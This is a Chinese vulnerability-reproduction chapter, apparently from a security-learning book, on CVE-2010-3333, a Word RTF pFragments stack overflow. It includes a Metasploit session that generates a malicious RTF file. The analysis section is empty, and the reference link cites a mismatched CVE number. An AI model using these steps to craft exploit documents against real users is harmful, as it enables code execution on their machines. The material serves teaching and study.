2018-05-22 14:21:13 +07:00
|
|
|
|
# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
|
|
|
|
|
|
|
|
|
|
- [漏洞描述](#漏洞描述)
|
|
|
|
|
- [漏洞复现](#漏洞复现)
|
|
|
|
|
- [漏洞分析](#漏洞分析)
|
|
|
|
|
- [参考资料](#参考资料)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
[下载文件](../src/exploit/7.1.9_ms_word_2010-3333)
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
| |推荐使用的环境 | 备注 |
|
|
|
|
|
| --- | --- | --- |
|
|
|
|
|
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
|
|
|
|
| 调试器 | OllyDbg | 版本号:吾爱专版 |
|
|
|
|
|
| 反汇编器 | IDA Pro | 版本号:7.0 |
|
|
|
|
|
| 漏洞软件 | MS Office | 版本号:2003 SP3 |
|
|
|
|
|
|
2018-06-08 19:46:05 +07:00
|
|
|
|
我们利用 Metasploit 来生成拒绝服务攻击样本:
|
|
|
|
|
```
|
|
|
|
|
msf > search cve-2010-3333
|
|
|
|
|
Name Disclosure Date Rank Description
|
|
|
|
|
---- --------------- ---- -----------
|
|
|
|
|
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
|
|
|
|
|
|
|
|
|
|
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
|
|
|
|
|
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > show info
|
|
|
|
|
|
|
|
|
|
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set target 6
|
|
|
|
|
target => 6
|
|
|
|
|
|
|
|
|
|
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set filename cve20103333.rtf
|
|
|
|
|
filename => cve20103333.rtf
|
|
|
|
|
|
|
|
|
|
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
|
|
|
|
|
[*] Creating 'cve20103333.rtf' file ...
|
|
|
|
|
[+] cve20103333.rtf stored at /home/firmy/.msf4/local/cve20103333.rtf
|
|
|
|
|
```
|
2018-05-22 14:21:13 +07:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞分析
|
|
|
|
|
|
|
|
|
|
## 参考资料
|
|
|
|
|
- https://www.cvedetails.com/cve/CVE-2010-2333
|